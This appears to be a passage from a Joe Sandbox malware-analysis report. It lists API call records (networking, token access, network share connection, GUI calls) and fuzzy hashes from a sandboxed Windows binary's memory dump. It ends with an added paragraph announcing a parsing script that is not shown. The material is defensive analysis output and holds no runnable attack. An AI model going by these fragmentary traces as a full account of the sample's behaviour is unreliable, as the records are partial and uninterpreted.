                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: b2e0202fe1b71154267c329365f02482bd6f4e778889f631973268ec1edf8e92
                                                                                                                    • Instruction ID: 1eb0e48541f2b52bcf81aa515a416db7e0e08e1e89fe5c51f77131e88f2e2d05
                                                                                                                    • Opcode Fuzzy Hash: b2e0202fe1b71154267c329365f02482bd6f4e778889f631973268ec1edf8e92
                                                                                                                    • Instruction Fuzzy Hash: 78119172900E11AFCF332FB4E859B5E3FDC9B153A2F110529FD459E2B1DE30AA449A90
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00325A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00387896,?,?,00000000), ref: 00325A2C
                                                                                                                      • Part of subcall function 00325A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00387896,?,?,00000000,?,?), ref: 00325A50
                                                                                                                    • gethostbyname.WSOCK32(?,?,?), ref: 00396399
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003963A4
                                                                                                                    • _memmove.LIBCMT ref: 003963D1
                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 003963DC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1504782959-0
                                                                                                                    • Opcode ID: 399d6ebd06437e084e546340ff78ea26e356cd39ba43868f021ce19912069c29
                                                                                                                    • Instruction ID: c72a746fac41cea67a398fe8ed4c453d006bfe166195f0681b0d8d8a3676388b
                                                                                                                    • Opcode Fuzzy Hash: 399d6ebd06437e084e546340ff78ea26e356cd39ba43868f021ce19912069c29
                                                                                                                    • Instruction Fuzzy Hash: 4D113076500119AFCF06FBA4ED86DEEB7BCAF19310B144065F506AB161DB30AE14DB61
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00378B61
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00378B73
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00378B89
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00378BA4
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: e81ecf67b1d52c34cb4982288def29b18ef4636a6a454ff01d6d8a95f82cc320
• Instruction ID: 562aadd5ddd18d6a7225541f21d3d02e1ff4130c7edcbe36cf7ce86b749c6a65
• Opcode Fuzzy Hash: e81ecf67b1d52c34cb4982288def29b18ef4636a6a454ff01d6d8a95f82cc320
• Instruction Fuzzy Hash: 45112E79941218FFDB11DF95CC85F9DBBB8FB48710F204095E904B7250DA716E11DB94
APIs
  • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
• DefDlgProcW.USER32(?,00000020,?), ref: 003212D8
• GetClientRect.USER32(?,?), ref: 0035B5FB
• GetCursorPos.USER32(?), ref: 0035B605
• ScreenToClient.USER32(?,?), ref: 0035B610
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: b7c5a931d776efb9f92e98533eecbef1df93c9da7637ee5749a14b8df9631cb4
• Instruction ID: 09a24db2fbd12a711e6991ddfe9c629638da74f3e3a6eead26d0b3ad47c66f9f
• Opcode Fuzzy Hash: b7c5a931d776efb9f92e98533eecbef1df93c9da7637ee5749a14b8df9631cb4
• Instruction Fuzzy Hash: F9116A35A00129EFCB12DFA8E9859EE77B8EB16300F000855F941E7251C730BA518BA5
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0037D84D
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0037D864
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0037D879
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0037D897
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
• Opcode ID: 8171fe478b0ad215656a267c7350271e8631533f78fc4cba3554bae70aa3f5ce
• Instruction ID: 52bede845afd853f5be9a587d1eb59fb87d1427e1d50c5ee4311ccc9d5523a81
• Opcode Fuzzy Hash: 8171fe478b0ad215656a267c7350271e8631533f78fc4cba3554bae70aa3f5ce
• Instruction Fuzzy Hash: 9A115E75605304EFE3318F91DC48F92BBFCEF04B00F108569A55AD6450D7B4E5499FA2
APIs
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction ID: 79a9c30a32e352b1f8938ae45dc5133e5b75aee5fe224fe81a53165aeabde601
• Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction Fuzzy Hash: C7014C7244814ABBCF175F84EC01CEE3FA6BB18352F598415FE185A071D236C9B9AB81
APIs
• GetWindowRect.USER32(?,?), ref: 003AB2E4
• ScreenToClient.USER32(?,?), ref: 003AB2FC
• ScreenToClient.USER32(?,?), ref: 003AB320
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 003AB33B
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: 4f0352fd0192017f5e49945bf2ca897092b76aca51fb2a27fe7bff773f23b973
• Instruction ID: fb78bbf4c6c1a0115883ad0913bc2299a5972a5537d5756d525800a95d7b3426
• Opcode Fuzzy Hash: 4f0352fd0192017f5e49945bf2ca897092b76aca51fb2a27fe7bff773f23b973
• Instruction Fuzzy Hash: 191143B9D00209EFDB41CFA9C8849EEFBB9FB19311F108166E914E3220D735AA559F90
APIs
• EnterCriticalSection.KERNEL32(?), ref: 00386BE6
  • Part of subcall function 003876C4: _memset.LIBCMT ref: 003876F9
• _memmove.LIBCMT ref: 00386C09
• _memset.LIBCMT ref: 00386C16
• LeaveCriticalSection.KERNEL32(?), ref: 00386C26
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: CriticalSection_memset$EnterLeave_memmove
• String ID:
• API String ID: 48991266-0
• Opcode ID: 882dc1439f4b81d33790ca17436e3be2c962d947182103846cbe18e3371f2e6e
• Instruction ID: 7b8503bee6cba68b9dea80a88927280ae9a828d535cd9802a357ac09568ebfe5
• Opcode Fuzzy Hash: 882dc1439f4b81d33790ca17436e3be2c962d947182103846cbe18e3371f2e6e
• Instruction Fuzzy Hash: CEF0543A200200ABCF426F95DC85A4ABB69EF46320F0480A1FE085E227D735E811CBB4
APIs
• GetSysColor.USER32(00000008), ref: 00322231
• SetTextColor.GDI32(?,000000FF), ref: 0032223B
• SetBkMode.GDI32(?,00000001), ref: 00322250
• GetStockObject.GDI32(00000005), ref: 00322258
• GetWindowDC.USER32(?,00000000), ref: 0035BE83
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0035BE90
• GetPixel.GDI32(00000000,?,00000000), ref: 0035BEA9
• GetPixel.GDI32(00000000,00000000,?), ref: 0035BEC2
• GetPixel.GDI32(00000000,?,?), ref: 0035BEE2
• ReleaseDC.USER32(?,00000000), ref: 0035BEED
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
• Opcode ID: 6ee771f1adfaf610c9c22f638aedf55ef73414fbbd78b30db1d36b62209a0538
• Instruction ID: 230139809bffbf3090113338034ae7ea50bbd2804a65314a45c330048bb34d7d
• Opcode Fuzzy Hash: 6ee771f1adfaf610c9c22f638aedf55ef73414fbbd78b30db1d36b62209a0538
• Instruction Fuzzy Hash: 2CE03932504244EEDB265FA4FC0DBD87B14EB06332F148366FA69480F187728984DB22
                                                                                                                    APIs
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0037871B
• OpenThreadToken.ADVAPI32(00000000,?,?,?,003782E6), ref: 00378722
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003782E6), ref: 0037872F
• OpenProcessToken.ADVAPI32(00000000,?,?,?,003782E6), ref: 00378736
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
Strings
Similarity
• API ID:
• String ID: %;
• API String ID: 0-3184110943
APIs
Strings
Similarity
• API ID: __itow_s
• String ID: xb>$xb>
• API String ID: 3653519197-4208917643
APIs
  • Part of subcall function 0033FC86: _wcscpy.LIBCMT ref: 0033FCA9
  • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
  • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
• __wcsnicmp.LIBCMT ref: 0038B02D
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0038B0F6
Strings
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
APIs
• Sleep.KERNEL32(00000000), ref: 00332968
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00332981
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
APIs
  • Part of subcall function 00324F0B: __fread_nolock.LIBCMT ref: 00324F29
• _wcscmp.LIBCMT ref: 00389824
• _wcscmp.LIBCMT ref: 00389837
Strings
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
APIs
Strings
Similarity
• API ID: ClearVariant
• String ID: Dd>$Dd>
• API String ID: 1473721057-946826178
APIs
• _memset.LIBCMT ref: 0039259E
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003925D4
Strings
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 003A7B61
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003A7B76
Strings
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 003A6B17
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003A6B53
Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                    • Opcode ID: 09b1220e3e2fb5384eb01cb78e20a557e5498e4eee15140f55864fe57e5178c0
                                                                                                                    • Instruction ID: daad737f22e3621ffed56517bb0e461f22dab8e4fa1b2513bc750c7a36d25033
                                                                                                                    • Opcode Fuzzy Hash: 09b1220e3e2fb5384eb01cb78e20a557e5498e4eee15140f55864fe57e5178c0
                                                                                                                    • Instruction Fuzzy Hash: 59319E71200604AEDB129F69CC81BFB73ADFF49760F158619F9AAD7190DB31AC91CB60
APIs
• _memset.LIBCMT ref: 00382911
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0038294C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 7e5f882e98192d234a9f46e9ee15042d59dcca9a3400ad20cf7d854763d4fd12
• Instruction ID: 71c1ba954c8f21096147b2aba43876efba9cba48b6ee1e800a2924860faf45fa
• Opcode Fuzzy Hash: 7e5f882e98192d234a9f46e9ee15042d59dcca9a3400ad20cf7d854763d4fd12
• Instruction Fuzzy Hash: 5B31F731A003059FDF26EF58C845BAFBBF8EF05350F150099ED85AA1A0D7709950CB11
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003A6761
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003A676C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: d3606b4197b33486d62715c2482030e387c870e25f8bcd012c9f4e173fd12ae1
• Instruction ID: fffa60b4b2fdf3c13b96c38cd3b6a38c2883fe5ba3e007c4ff095efa298826e1
• Opcode Fuzzy Hash: d3606b4197b33486d62715c2482030e387c870e25f8bcd012c9f4e173fd12ae1
• Instruction Fuzzy Hash: 0A11B675210208AFEF139F54DC81EBB376EEB56368F150125F9149B290D632DC5187A0
APIs
  • Part of subcall function 00321D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00321D73
  • Part of subcall function 00321D35: GetStockObject.GDI32(00000011), ref: 00321D87
  • Part of subcall function 00321D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00321D91
• GetWindowRect.USER32(00000000,?), ref: 003A6C71
• GetSysColor.USER32(00000012), ref: 003A6C8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: 0de0e037a07e7afa5314b400b7ebbbdcc4d318ff6dbfb4eb2474c7aa68213887
• Instruction ID: fc6d0585e0768636cca9ca96468bcf95443a92517e63ea9fe04aa5381aeef654
• Opcode Fuzzy Hash: 0de0e037a07e7afa5314b400b7ebbbdcc4d318ff6dbfb4eb2474c7aa68213887
• Instruction Fuzzy Hash: 67215972510219AFDF06DFB8CC46AFA7BA9FB09314F054628F995D2250D735E850DB60
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 003A69A2
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003A69B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 27abc2313c664ffdcbc0e2f7601619bd9e0eb2e8ef769fef6220b7c4de2c794c
• Instruction ID: 0617cda29d3fb7998806bbec6637c3024fc741c41eaf7d75cc174f9f8ff681ba
• Opcode Fuzzy Hash: 27abc2313c664ffdcbc0e2f7601619bd9e0eb2e8ef769fef6220b7c4de2c794c
• Instruction Fuzzy Hash: 98116A71500208AFEB128F64DC46AEB37ADEB17378F554728F9A5961E0C731DC519B60
APIs
• _memset.LIBCMT ref: 00382A22
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00382A41
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 17087361f6e04094c2bb03dd30c4cc7198bdc308c6e72f9ef491665a7df1a665
• Instruction ID: a59f78def4c2962fe4ec8e06ae1362a9967183caa13063bf492f29c50b3252d8
• Opcode Fuzzy Hash: 17087361f6e04094c2bb03dd30c4cc7198bdc308c6e72f9ef491665a7df1a665
• Instruction Fuzzy Hash: C011D336901314AFCB3BEB98D944B9B73BCAF46304F0641A1E855EB290DB34AD06C791
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0039222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00392255
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: 3fb26dd57057a6a8271f00363b3acb050c102a51b10261416f71866257fc32a1
• Instruction ID: 0f4b224a23c02b3d2f7240da687f98b215f0921763b361821870126802ec4316
• Opcode Fuzzy Hash: 3fb26dd57057a6a8271f00363b3acb050c102a51b10261416f71866257fc32a1
• Instruction Fuzzy Hash: 51110E70541A25BEDF2A8F518C88EFBFBACFF06751F108A2AF98586400D3706890D6F0
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00323C14,003E52F8,?,?,?), ref: 0033096E
  • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
• _wcscat.LIBCMT ref: 00364CB7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: FullNamePath_memmove_wcscat
• String ID: S>
• API String ID: 257928180-3032909728
• Opcode ID: a7fd055bdf4722c7067e6481e6a801cf8240a0768fa576f0fa30b41d100b76fc
• Instruction ID: 2bce7b41de0261ceb4f7869e43f5ad9dc1a4af8688ceb520202019f982ddfff7
• Opcode Fuzzy Hash: a7fd055bdf4722c7067e6481e6a801cf8240a0768fa576f0fa30b41d100b76fc
• Instruction Fuzzy Hash: 2811A135A05218ABCB47EBA4D886FDD73ECFF09341F0045A5B949DB2A1EBB0A6844B10
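The function records in this section show every numeric argument as raw hex (SendMessageW with 00000143, 0000014E, 000000B1 and 000001A2; InternetSetOptionW with option 00000032 and an 8-byte buffer; GetStockObject with 00000011; GetSysColor with 00000012), which is the form a reader has to decode by hand before the call makes sense. The following script is an added example for this page, not Joe Sandbox code and not code from the analysed sample: it parses bullet lines in the report's "APIs" format into structured call entries and names the constants from the Windows SDK headers. The sample input is a constructed subset copied from records on this page; the regular expression, the dictionary layout and the constant tables are this example's own choices, and only the constants seen on the page are tabulated.

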